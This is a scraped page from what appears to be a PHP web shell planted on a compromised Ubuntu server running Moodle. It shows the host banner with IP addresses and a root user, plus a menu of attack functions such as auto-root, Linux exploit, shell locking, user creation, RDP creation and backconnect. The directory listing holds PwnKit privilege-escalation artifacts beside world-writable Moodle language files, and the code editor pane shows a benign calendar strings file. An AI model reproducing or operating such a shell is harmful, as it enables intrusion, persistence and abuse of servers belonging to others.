Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
lang /
en /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
access.php
1.7
KB
-rwxrwxrwx
admin.php
120.93
KB
-rwxrwxrwx
auth.php
12.49
KB
-rwxrwxrwx
backup.php
16.61
KB
-rwxrwxrwx
badges.php
24.56
KB
-rwxrwxrwx
block.php
4.82
KB
-rwxrwxrwx
blog.php
10.88
KB
-rwxrwxrwx
bulkusers.php
2.15
KB
-rwxrwxrwx
cache.php
9.73
KB
-rwxrwxrwx
calendar.php
10.81
KB
-rwxrwxrwx
cohort.php
2.61
KB
-rwxrwxrwx
completion.php
12.16
KB
-rwxrwxrwx
condition.php
7.58
KB
-rwxrwxrwx
countries.php
8.54
KB
-rwxrwxrwx
currencies.php
6.62
KB
-rwxrwxrwx
dbtransfer.php
1.86
KB
-rwxrwxrwx
debug.php
3.1
KB
-rwxrwxrwx
editor.php
6.73
KB
-rwxrwxrwx
edufields.php
22.9
KB
-rwxrwxrwx
enrol.php
7.73
KB
-rwxrwxrwx
error.php
43.74
KB
-rwxrwxrwx
filters.php
3.87
KB
-rwxrwxrwx
form.php
3.28
KB
-rwxrwxrwx
grades.php
45.54
KB
-rwxrwxrwx
grading.php
5.24
KB
-rwxrwxrwx
group.php
10.37
KB
-rwxrwxrwx
hub.php
18.49
KB
-rwxrwxrwx
imscc.php
2.11
KB
-rwxrwxrwx
install.php
26.06
KB
-rwxrwxrwx
iso6392.php
16.04
KB
-rwxrwxrwx
langconfig.php
2.16
KB
-rwxrwxrwx
license.php
1.36
KB
-rwxrwxrwx
mathslib.php
2.06
KB
-rwxrwxrwx
media.php
3.39
KB
-rwxrwxrwx
message.php
8.06
KB
-rwxrwxrwx
mimetypes.php
2.78
KB
-rwxrwxrwx
mnet.php
20.37
KB
-rwxrwxrwx
moodle.php
113.63
KB
-rwxrwxrwx
my.php
689
B
-rwxrwxrwx
notes.php
2.67
KB
-rwxrwxrwx
pagetype.php
1.91
KB
-rwxrwxrwx
pix.php
1.57
KB
-rwxrwxrwx
plagiarism.php
748
B
-rwxrwxrwx
plugin.php
10.22
KB
-rwxrwxrwx
portfolio.php
14.26
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
question.php
33.99
KB
-rwxrwxrwx
rating.php
3.02
KB
-rwxrwxrwx
repository.php
13.2
KB
-rwxrwxrwx
role.php
25.26
KB
-rwxrwxrwx
search.php
3.58
KB
-rwxrwxrwx
table.php
1.33
KB
-rwxrwxrwx
tag.php
3.97
KB
-rwxrwxrwx
timezones.php
18.44
KB
-rwxrwxrwx
userkey.php
1.98
KB
-rwxrwxrwx
webservice.php
16.75
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : calendar.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Strings for component 'calendar', language 'en', branch 'MOODLE_20_STABLE' * * @package calendar * @copyright 1999 onwards Martin Dougiamas {@link http://moodle.com} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ $string['advancedoptions'] = 'Advanced options'; $string['allday'] = 'All day'; $string['addevent'] = 'Add events'; $string['annually'] = 'Annually'; $string['calendar'] = 'Calendar'; $string['calendarheading'] = '{$a} Calendar'; $string['calendarpreferences'] = 'Calendar preferences'; $string['calendarurl'] = 'Calendar URL: {$a}'; $string['clickhide'] = 'click to hide'; $string['clickshow'] = 'click to show'; $string['colcalendar'] = 'Calendar'; $string['collastupdated'] = 'Last updated'; $string['colpoll'] = 'Update'; $string['colactions'] = 'Actions'; $string['commontasks'] = 'Options'; $string['confirmeventdelete'] = 'Are you sure you want to delete this event?'; $string['course'] = 'Course'; $string['courseevent'] = 'Course event'; $string['courseevents'] = 'Course events'; $string['courses'] = 'Courses'; $string['customexport'] = 'Custom range ({$a->timestart} - {$a->timeend})'; $string['daily'] = 'Daily'; $string['dayview'] = 'Day view'; $string['dayviewtitle'] = 'Day view: {$a}'; $string['daywithnoevents'] = 'There are no events this day.'; $string['default'] = 'Default'; $string['deleteevent'] = 'Delete event'; $string['deleteevents'] = 'Delete events'; $string['detailedmonthview'] = 'Detailed month view'; $string['detailedmonthviewtitle'] = 'Detailed month view: {$a}'; $string['durationminutes'] = 'Duration in minutes'; $string['durationnone'] = 'Without duration'; $string['durationuntil'] = 'Until'; $string['editevent'] = 'Editing event'; $string['erroraddingevent'] = 'Failed to add event'; $string['errorbadsubscription'] = 'Calendar subscription not found.'; $string['errorbeforecoursestart'] = 'Cannot set event before course start date'; $string['errorcannotimport'] = 'You cannot set up a calendar subscription at this time.'; $string['errorinvaliddate'] = 'Invalid date'; $string['errorinvalidminutes'] = 'Specify duration in minutes by giving a number between 1 and 999.'; $string['errorinvalidrepeats'] = 'Specify the number of events by giving a number between 1 and 99.'; $string['errorinvalidicalurl'] = 'The given iCal URL is invalid.'; $string['errornodescription'] = 'Description is required'; $string['errornoeventname'] = 'Name is required'; $string['errorrequiredurlorfile'] = 'Either a URL or a file is required to import a calendar.'; $string['eventdate'] = 'Date'; $string['eventdescription'] = 'Description'; $string['eventduration'] = 'Duration'; $string['eventendtime'] = 'End time'; $string['eventinstanttime'] = 'Time'; $string['eventkind'] = 'Type of event'; $string['eventname'] = 'Event title'; $string['eventnone'] = 'No events'; $string['eventrepeat'] = 'Repeats'; $string['eventsall'] = 'All events'; $string['eventsdeleted'] = 'Events deleted'; $string['eventsimported'] = 'Events imported: {$a}'; $string['eventsupdated'] = 'Events updated: {$a}'; $string['eventsfor'] = '{$a} events'; $string['eventskey'] = 'Events key'; $string['eventsrelatedtocourses'] = 'Events related to courses'; $string['eventstarttime'] = 'Start time'; $string['eventtime'] = 'Time'; $string['eventview'] = 'Event details'; $string['expired'] = 'Expired'; $string['explain_site_timeformat'] = 'You can choose to see times in either 12 or 24 hour format for the whole site. If you choose "default", then the format will be automatically chosen according to the language you use in the site. This setting can be overridden by user preferences.'; $string['export'] = 'Export'; $string['exportbutton'] = 'Export'; $string['exportcalendar'] = 'Export calendar'; $string['for'] = 'for'; $string['fri'] = 'Fri'; $string['friday'] = 'Friday'; $string['generateurlbutton'] = 'Get calendar URL'; $string['global'] = 'Global'; $string['globalevent'] = 'Global event'; $string['globalevents'] = 'Global events'; $string['gotocalendar'] = 'Go to calendar'; $string['group'] = 'Group'; $string['groupevent'] = 'Group event'; $string['groupevents'] = 'Group events'; $string['hidden'] = 'hidden'; $string['hidecourseevents'] = 'Hide course events'; $string['hideglobalevents'] = 'Hide global events'; $string['hidegroupsevents'] = 'Hide group events'; $string['hideuserevents'] = 'Hide user events'; $string['hourly'] = 'Hourly'; $string['ical'] = 'iCal'; $string['importcalendar'] = 'Import calendar'; $string['importcalendarheading'] = 'Import calendar...'; $string['importcalendarfrom'] = 'Import from'; $string['importfromfile'] = 'Calendar file (.ics)'; $string['importfromurl'] = 'Calendar URL'; $string['importfrominstructions'] = 'Please provide either a URL to a remote calendar, or upload a file.'; $string['invalidtimedurationminutes'] = 'The duration in minutes you have entered is invalid. Please enter the duration in minutes greater than 0 or select no duration.'; $string['invalidtimedurationuntil'] = 'The date and time you selected for duration until is before the start time of the event. Please correct this before proceeding.'; $string['iwanttoexport'] = 'Export'; $string['managesubscriptions'] = 'Manage subscriptions'; $string['manyevents'] = '{$a} events'; $string['mon'] = 'Mon'; $string['monday'] = 'Monday'; $string['monthly'] = 'Monthly'; $string['monthlyview'] = 'Monthly view'; $string['monthnext'] = 'Next month'; $string['monththis'] = 'This month'; $string['namewithsource'] = '{$a->name}({$a->source})'; $string['never'] = 'Never'; $string['newevent'] = 'New event'; $string['notitle'] = 'no title'; $string['noupcomingevents'] = 'There are no upcoming events'; $string['nocalendarsubscriptions'] = 'You have no calendar subscriptions.'; $string['oneevent'] = '1 event'; $string['pollinterval'] = 'Update interval'; $string['pollinterval_help'] = 'How often you would like the calendar to update with new events.'; $string['preferences'] = 'Preferences'; $string['preferences_available'] = 'Your personal preferences'; $string['pref_lookahead'] = 'Upcoming events look-ahead'; $string['pref_lookahead_help'] = 'This sets the (maximum) number of days in the future that an event has to start in in order to be displayed as an upcoming event. Events that start beyond this will never be displayed as upcoming. Please note that <strong>there is no guarantee</strong> that all events starting in this time frame will be displayed; if there are too many (more than the "Maximum upcoming events" preference) then the most distant events will not be shown.'; $string['pref_maxevents'] = 'Maximum upcoming events'; $string['pref_maxevents_help'] = 'This sets the maximum number of upcoming events that can be displayed. If you pick a large number here it is possible that upcoming events displays will take up a lot of space on your screen.'; $string['pref_persistflt'] = 'Remember filter settings'; $string['pref_persistflt_help'] = 'If this is enabled, then Moodle will remember your last event filter settings and automatically restore them each time you login.'; $string['pref_startwday'] = 'First day of week'; $string['pref_startwday_help'] = 'Calendar weeks will be shown as starting on the day that you select here.'; $string['pref_timeformat'] = 'Time display format'; $string['pref_timeformat_help'] = 'You can choose to see times in either 12 or 24 hour format. If you choose "default", then the format will be automatically chosen according to the language you use in the site.'; $string['quickdownloadcalendar'] = 'Quick download / subscribe to calendar'; $string['recentupcoming'] = 'Recent and next 60 days'; $string['repeatedevents'] = 'Repeated events'; $string['repeateditall'] = 'Also apply changes to the other {$a} events in this repeat series'; $string['repeateditthis'] = 'Apply changes to this event only'; $string['repeatevent'] = 'Repeat this event'; $string['repeatnone'] = 'No repeats'; $string['repeatweeksl'] = 'Repeat weekly, creating altogether'; $string['repeatweeksr'] = 'events'; $string['sat'] = 'Sat'; $string['saturday'] = 'Saturday'; $string['showcourseevents'] = 'Show course events'; $string['showglobalevents'] = 'Show global events'; $string['showgroupsevents'] = 'Show group events'; $string['showuserevents'] = 'Show user events'; $string['shown'] = 'shown'; $string['siteevents'] = 'Site events'; $string['spanningevents'] = 'Events underway'; $string['subscriptions'] = 'Subscriptions'; $string['subscriptionname'] = 'Calendar name'; $string['subscriptionremoved'] = 'Calendar subscription {$a} removed'; $string['subscriptionupdated'] = 'Calendar subscription {$a} updated'; $string['subsource'] = 'Event source: {$a->name}'; $string['sun'] = 'Sun'; $string['sunday'] = 'Sunday'; $string['thu'] = 'Thu'; $string['thursday'] = 'Thursday'; $string['timeformat_12'] = '12-hour (am/pm)'; $string['timeformat_24'] = '24-hour'; $string['today'] = 'Today'; $string['tomorrow'] = 'Tomorrow'; $string['tt_deleteevent'] = 'Delete event'; $string['tt_editevent'] = 'Edit event'; $string['tt_hidecourse'] = 'Course events are shown (click to hide)'; $string['tt_hideglobal'] = 'Global events are shown (click to hide)'; $string['tt_hidegroups'] = 'Group events are shown (click to hide)'; $string['tt_hideuser'] = 'User events are shown (click to hide)'; $string['tt_showcourse'] = 'Course events are hidden (click to show)'; $string['tt_showglobal'] = 'Global events are hidden (click to show)'; $string['tt_showgroups'] = 'Group events are hidden (click to show)'; $string['tt_showuser'] = 'User events are hidden (click to show)'; $string['tue'] = 'Tue'; $string['tuesday'] = 'Tuesday'; $string['typecourse'] = 'Course event'; $string['typegroup'] = 'Group event'; $string['typesite'] = 'Site event'; $string['typeuser'] = 'User event'; $string['upcomingevents'] = 'Upcoming events'; $string['urlforical'] = 'URL for iCalendar export, for subscribing to calendar'; $string['user'] = 'User'; $string['userevent'] = 'User event'; $string['userevents'] = 'User events'; $string['wed'] = 'Wed'; $string['wednesday'] = 'Wednesday'; $string['weekly'] = 'Weekly'; $string['weeknext'] = 'Next week'; $string['weekthis'] = 'This week'; $string['yesterday'] = 'Yesterday'; $string['youcandeleteallrepeats'] = 'This event is part of a repeating event series. You can delete this event only, or all {$a} events in the series at once.';
Close